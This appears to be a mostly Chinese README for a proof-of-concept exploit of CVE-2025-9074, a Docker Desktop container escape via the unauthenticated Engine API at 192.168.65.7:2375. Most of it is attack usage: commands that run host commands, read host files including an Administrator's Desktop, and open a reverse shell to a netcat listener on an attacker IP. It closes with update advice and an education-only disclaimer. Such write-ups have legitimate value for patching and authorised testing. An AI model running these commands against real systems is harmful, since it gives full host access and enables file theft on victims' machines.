Proof of concept exploit for CVE-2025-9074 - Unauthenticated Docker Engine API container escape affecting Docker Desktop < 4.44.3 on Windows and macOS (CVSS 9.3)
CVE-2025-9074 的概念验证利用程序——Docker Desktop 中的一个严重容器逃逸漏洞,允许未授权访问 Docker Engine API。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2025-9074 |
| CVSS 评分 | 9.3(严重) |
| 受影响软件 | Docker Desktop < 4.44.3 |
| 受影响平台 | Windows、macOS(Linux 不受影响) |
| 修复版本 | Docker Desktop 4.44.3+ |
| 发现者 | Felix Boulet、Philippe Dugré |
| 发现日期 | 2025 年中 |
| 修复日期 | 2025 年 8 月 20 日 |
该漏洞允许在 Docker Desktop 上运行的容器无需认证即可访问位于 http://192.168.65.7:2375 的 Docker Engine API。无论以下设置如何,此问题均会发生:
Docker Engine API 暴露在容器可访问的 TCP 套接字上,允许:
pip3 install requests
# 在主机上执行命令
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# 从 Windows 主机读取文件
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# 列出 Windows 上的用户
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# 终端1:设置监听器
nc -lvnp 4444
# 终端2:执行利用程序
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# 连接后,主机文件系统位于:/hostfs
# 如果你已经拥有对容器的访问权限
curl http://192.168.65.7:2375/version
graph TD
A[恶意容器] -->|无需认证| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|创建容器| C[特权容器]
C -->|挂载主机文件系统| D[完全主机访问]
D -->|读取/写入| E[危害系统]立即更新到 Docker Desktop 4.44.3 或更高版本。
# 检查你的 Docker Desktop 版本
docker --version
# 更新 Docker Desktop
# Windows:从 https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe 下载
# macOS:从 https://desktop.docker.com/mac/main/amd64/Docker.dmg 下载
如果无法立即更新:
本工具仅供教育和授权安全测试目的使用。
MIT 许可证 - 详情请参阅 LICENSE 文件